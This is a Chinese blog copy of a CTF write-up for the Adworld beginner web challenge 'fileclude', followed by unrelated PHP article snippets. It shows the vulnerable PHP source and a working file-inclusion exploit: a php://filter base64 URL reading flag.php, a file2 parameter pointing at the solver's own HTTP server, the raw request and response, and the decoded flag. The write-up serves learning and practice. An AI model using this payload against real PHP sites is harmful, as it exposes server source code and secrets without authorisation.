程序员经验分享-hwhale

攻防世界-adworld-fileclude-新手

2023-11-13

攻防世界-adworld-fileclude-新手

34最佳Writeup由 Haojie 提供WriteUP

收藏

反馈

难度:1

方向:Web

题解数:13

解出人数:2346

题目来源: CTF

题目描述:

好多file呀!

题目场景:

http://61.147.171.105:60895

100%

倒计时: 35927

image-20221120170602497

image-20221120191931378

┌──(kwkl㉿kwkl)-[~/HODL/adworld/web/fileinclude]
└─$ python3 -m http.server 5555
Serving HTTP on 0.0.0.0 port 5555 (http://0.0.0.0:5555/) ...
10.10.10.140 - - [20/Nov/2022 17:18:39] "GET / HTTP/1.1" 200 -

image-20221120192102839

http://61.147.171.105:60895/??file1=php://filter/read=convert.base64-encode/resource=/var/www/html/flag.php&file2=http://127.0.0.1:5555/file2.php

image-20221120192454128

GET /?file1=php://filter/read=convert.base64-encode/resource=/var/www/html/flag.php&file2=http://x.x.x.x:5555/file2.php HTTP/1.1
Host: 61.147.171.105:60895
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 0



HTTP/1.1 200 OK
Date: Sun, 20 Nov 2022 10:16:15 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.23
Vary: Accept-Encoding
Content-Length: 2529
Connection: close
Content-Type: text/html

WRONG WAY!<code><span style="color: #000000">
<span style="color: #0000BB">&lt;?php<br /></span><span style="color: #007700">include(</span><span style="color: #DD0000">"flag.php"</span><span style="color: #007700">);<br /></span><span style="color: #0000BB">highlight_file</span><span style="color: #007700">(</span><span style="color: #0000BB">__FILE__</span><span style="color: #007700">);<br />if(isset(</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">"file1"</span><span style="color: #007700">])&nbsp;&amp;&amp;&nbsp;isset(</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">"file2"</span><span style="color: #007700">]))<br />{<br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">$file1&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">"file1"</span><span style="color: #007700">];<br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">$file2&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">"file2"</span><span style="color: #007700">];<br />&nbsp;&nbsp;&nbsp;&nbsp;if(!empty(</span><span style="color: #0000BB">$file1</span><span style="color: #007700">)&nbsp;&amp;&amp;&nbsp;!empty(</span><span style="color: #0000BB">$file2</span><span style="color: #007700">))<br />&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(</span><span style="color: #0000BB">file_get_contents</span><span style="color: #007700">(</span><span style="color: #0000BB">$file2</span><span style="color: #007700">)&nbsp;===&nbsp;</span><span style="color: #DD0000">"hello&nbsp;ctf"</span><span style="color: #007700">)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;include(</span><span style="color: #0000BB">$file1</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />&nbsp;&nbsp;&nbsp;&nbsp;}<br />&nbsp;&nbsp;&nbsp;&nbsp;else<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;die(</span><span style="color: #DD0000">"NONONO"</span><span style="color: #007700">);<br />}</span>
</span>
</code>PD9waHAKZWNobyAiV1JPTkcgV0FZISI7Ci8vICRmbGFnID0gY3liZXJwZWFjZXtmYjJhN2M1OWFjMmFkYzI2MjNmYmQwYjEwMjIxODgzNX0=

image-20221120191728484

// $flag = cyberpeace{fb2a7c59ac2adc2623fbd0b102218835}

 <?php
echo "WRONG WAY!";
// $flag = cyberpeace{fb2a7c59ac2adc2623fbd0b102218835}

image-20221120191823018

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

作业

Web

攻防世界CTF

php

CTF

攻防世界-adworld-fileclude-新手 的相关文章

  • 使用 PHP 将 latin1_swedish_ci 转换为 utf8

    我有一个数据库 里面充满了类似的值 Dhaka 应该是 Dhaka 因为我在创建数据库时没有指定排序规则 现在我想修复它 我无法从最初获取数据的地方再次获取数据 所以我在想是否可以在 php 脚本中获取数据并将其转换为正确的字符 我已将数据

  • 如果产品重量超过1000克,如何以公斤为单位显示

    在 Storefront 主题中 我使用下面的代码将格式化重量从 1000g 更改为 1kg add action woocommerce after shop loop item title show weight 10 function

  • 理想的 PHP 会话大小?

    我有一个 PHP 表单 抵押应用程序 大约有 400 个字段 该网站的流量会很低 对于进入 MySQL 数据库的 400 个字段 理想的会话大小是多少 In php ini我要设置什么 我应该设置我缺少的任何内容吗 会话的大小没有限制 但

  • 如何在 Laravel 5 中对合并集合进行分页?

    我正在创建一个包含两种类型的对象的流 BluePerson 和 RedPerson 为了创建流 我获取所有这两个对象 然后将它们合并到一个集合中 这样做之后 我需要对它们进行分页 但是分页似乎是针对雄辩的模型和数据库查询 而不是集合 我见过

  • 从目录中读取所有文件内容 - php

    这实际上是一个简单的任务 我想显示指定文件夹中所有文件的内容 我正在传递目录名称 echo a href row qname a 在第二页上 我正在迭代目录内容 while entryname readdir myDirectory if

  • 在 php 和 mysql 中使用 utf8mb4

    我读过 mysql gt 5 5 3 完全支持每个可能的字符 如果您使用编码utf8mb4对于某个表 列http mathiasbynens be notes mysql utf8mb4 http mathiasbynens be note

  • 如何在 PHP 中运行 shell 脚本?

    我正在尝试使用 PHP 触发 shell 脚本的运行 本质上 当用户在我们用 PHP 编写的网站上完成一个操作时 我们希望触发一个 shell 脚本 该脚本本身调用一个 Java 文件 提前致谢 See shell exec http ph

  • 限制分页页数

    objConnect mysql connect localhost root or die mysql error objDB mysql select db Test strSQL SELECT FROM UserAddedRecord

  • 用PHP动态生成二维码[关闭]

    Closed 此问题正在寻求书籍 工具 软件库等的推荐 不满足堆栈溢出指南 help closed questions 目前不接受答案 我正在尝试在我的网站上生成二维码 他们所要做的就是在其中包含一个 URL 我网站上的变量将提供该 URL

  • 正确的标头 php mysql blob 显示图像

    我正在尝试在我的 PHP 页面中显示来自 mysql blob 的图像 我知道这不是最佳实践 然后我会将其引入我的 iOS 应用程序中 我在设置页面标题时遇到问题 我认为需要将其设置为图像 所以 这显示了图像 但我不相信页眉是正确的 hea

  • Opencart 的 $this->config->get('module_var_name')

    我正在尝试自定义 Opencart 支付模块 我看到很多地方都使用了配置信息 但我找不到任何创建正在使用的变量的内容 我知道在管理页面中 如果我选择 paypal 标准 我可以设置所有 配置 信息 但我找不到强调它的 模型 是否有模型 我希

  • 无法显示由 Fine-uploader 上传到 Amazon s3 的图像

    我现在尝试设置fineuploader s3以显示在aws服务器上成功上传的文件的图像 如示例页面上所做的那样 http fineuploader com s3 demo http fineuploader com s3 demo 我 仍然

  • PHP别名@函数

    我是 PHP 新手 看到一些使用 前缀调用函数 如 mysql ping 的示例 我感到很困惑 它是做什么用的 谷歌搜索 搜索没有太大帮助 因为 被丢弃并且 别名 不是足够好的关键字 抑制错误 警告和通知 如果你用自定义的方式补充它 你可以

  • Laravel 上传前如何压缩图像?

    我正在制作一个图片库网站 用户可以在其中上传任何图像 它们将显示在前端 我需要在不影响图像质量的情况下压缩图像 以减小图像大小 以便页面加载速度不会影响那么大 我使用以下代码来上传图像 rules array file gt require

  • MySQL 中布尔值的 TINYINT 与 ENUM(0, 1)

    MyISAM 表和 MySQL 5 1 中具有 0 和 1 值的 Tinyint 或 ENUM 0 1 哪个更好 您可以使用BIT 1 如中提到的MySQL 5 1 参考 http dev mysql com doc refman 5 1

  • 无法在 PHPUnit 中使用数据提供程序运行单个测试

    使用命令行运行测试时遇到问题 如果我像这样运行 phpunit phpunit no configuration filter testAdd DataTest DataProviderTest php 效果很好 但是我们使用正则表达式来准

  • PHP:展平数组-最快的方法? [复制]

    这个问题在这里已经有答案了 是否有任何快速方法可以在不运行 foreach 循环的情况下展平数组并选择子键 在本例中为 键 和 值 或者 foreach 始终是最快的方法 Array 0 gt Array key gt string val

  • 在 PHP 中使用数组来比较用户名/密码

    我有以下 php 脚本 其中有一个用户名和密码 Username user1 Password pass1 if isset POST submitform Clean up the input values foreach POST as

  • phpstorm xdebug 与 symfony2 项目

    我正在尝试使用 xdebug 和 phpstorm 调试 symfony2 应用程序 我的本地开发环境是Ubuntu 14 04 with apache2 Xdebug版本是2 2 7 我在另一个 php 不是 symfony2 项目上使用

  • PHP:如何检查总数。 URL 中的参数?

    我正在使用 REQUEST 检索参数 有没有办法找到总数 URL 中的参数 而不是检索每个参数然后进行计数 这将为您提供总数 分隔的 URL 查询参数 count explode SERVER QUERY STRING 如果您只想要唯一的参

随机推荐

  • 开题报告

    开题报告的研究方案 目录 主要研究内容 实施方案 可行性分析论证 论文的进度安排 关键的科学问题 工程技术基础问题 学位论文预期的创新点 一份模板 工大 目录 主要研究内容 a a a 实施方案 a 可行性分析论证 设计方案的可行性研究就是

  • python turtle绕原点旋转_python习题

    python习题 第一章习题测试 1 单选题 Python语言是由哪个人创造的 A Dennis Ritchie B Linus Benedict Torvalds C Guido van Rossum D Tim Peters 正确答案

  • 通俗易懂的TextCNN

    目录 前言 一 TextCNN详解 1 TextCNN是什么 2 TextCNN 的优势 3 TextCNN 的网络计算原理 总结 前言 了解TextCNN 看这一篇就够了 一 TextCNN详解 1 TextCNN是什么 我们之前提到CN

  • Xcodebuild使用方法

    xcodebuild 使用手册 localhost bin han xcodebuild h xcodebuild error invalid option h Usage xcodebuild project

  • vue3中如果注册的是全局组件,props就没有类型提示了怎么办,三分钟教会你。

    问题 vue3中如果注册的是局部组件 那么props是有类型提示的 但是如果注册的是全局组件 props就没有类型提示了 失去了类型校验的并缺少了类型提示 怎么办 分析思路 同样是全局组件而在element plus中的组件有提示呢 参考资

  • PCB元件创建

    目录 一 创建元件基本流程 1 1 创建一个原理图库 1 2 创建元件 1 3绘制 1 4放置管脚 二 元件创建 2 1电容类元件创建 2 2 电感类元件 2 3 电阻类元件 2 4LED元件 2 5按键元件 2 6芯片类元件创建 2 6

  • Teradata 数据库介绍

    author skate time 2010 03 11 Teradata 数据库介绍 Teradata在整体上是按Shared Nothing 架构体系进行组织的 他的定位就是大型数据仓库系统 定位比较高 他的软硬件都是NCR自己的 其他

  • Hibernate 一对一关系中的联接查询

    一 类 2个Bean Users和 UsersLogin 通过userId关联 public class Users implements Serializable private Long userId 用户编号 private Stri

  • 机器学习算法实战项目—支持向量机(1)—应用简化版SMO算法处理小规模数据集

    提供数据集如下 链接 https pan baidu com s 1 k3vn7Rwt6DnKI VcO8MPw 提取码 6666 此外 完整版的学习笔记已经上传 有需要的可以去我的主页找 Latex排版后生成的文档 SVM的代码实现 引言

  • 计算机二级题目之函数学习

    1 给定程序功能是计算S f n f n 1 f 0 f 1 f 2 f n 的值 float f double x if x 0 0 x 2 0 return 1 else if x lt 0 0 return x 1 x 2 else

  • BUUCTF Crypto(密码学)刷题

    MD5 拿到一串字符串e00cf25ad42683b3df678c61f42c6bda 根据题目可到在线MD5在线解密 拿到flag Url编码 根据提示可知是url编码 url编码在线解密 一眼就解密 的确 一眼就解密了 非常明显的bes

  • mysql datetime分组统计下载量

    假设我们的mysql数据库中有一个这样的一个表 他的字段是这样的 userid varchar64 article id varchar64 create date datetime 用户的id 文章的id 和下载的时间 那么现在有一个这样

  • Linux查看python可用版本&更改默认python版本

    为什么80 的码农都做不了架构师 gt gt gt update alternatives install usr bin python python usr bin python2 7 1 update alternatives inst

  • C语言编写一个程序,输入一个数 n,使其能够输出最中间一行“ * ”个数为 n 的菱形。

    编写一个程序 输入一个数 n 使其能够输出最中间一行 菱形 的水平对角线 字符个数为 n 的菱形 输入的数保证为正奇数 代码 include

  • 毕业设计-深度学习网络模型在文本情感分类任务中的应用

    目录 前言 课题背景和意义 实现技术思路 一 主要计量指标统计分析 二 基于关键词共现的分析 三 文本情感分类研究热点 实现效果图样例 最后 前言 大四是整个大学期间最忙碌的时光 一边要忙着备考或实习为毕业后面临的就业升学做准备 一边要为毕

  • [NOIP 2014复习]第二章:搜索

    一 深度优先搜索 DFS 1 Wikioi 1066引水入城 题目描述 Description 在一个遥远的国度 一侧是风景秀美的湖泊 另一侧则是漫无边际的沙漠 该国的行政 区划十分特殊 刚好构成一个N行M列的矩形 如上图所示 其中每个格子

  • orcale 存储过程详细教程以及pl/sql的语法

    目录 Oracle存储过程详细教程 1 1 创建存储过程语法 1 2 输出案例 1 3 带参数的存储过程 1 4 存储过程进行返回 1 5 调用存储过程 2 pl sql的语法 2 1 定义变量 2 2 为变量直接赋值使用 或者into 2

  • react实现点击获取json对象的jsonPath

    准备 安装 react json view npm install save react json view 可参考的一些开源库 react json path picker json path picker 线上工具 jsonpath t

  • Unity3D控制物体移动

    在游戏开发中 游戏物体的移动是最基本的 如果连物体都移动不起来 那就不用说玩游戏了 下面记录了自己在开发中实现的物体移动 不同项目可能有不同的物体移动实现 也有很多种不同的物体移动实现 文章会持续更新 1 rigidbody MovePos

  • 攻防世界-adworld-fileclude-新手

    攻防世界 adworld fileclude 新手 34最佳Writeup由 Haojie 提供WriteUP 收藏 反馈 难度 1 方向 Web 题解数 13 解出人数 2346 题目来源 CTF 题目描述 好多file呀 题目场景 ht

热门标签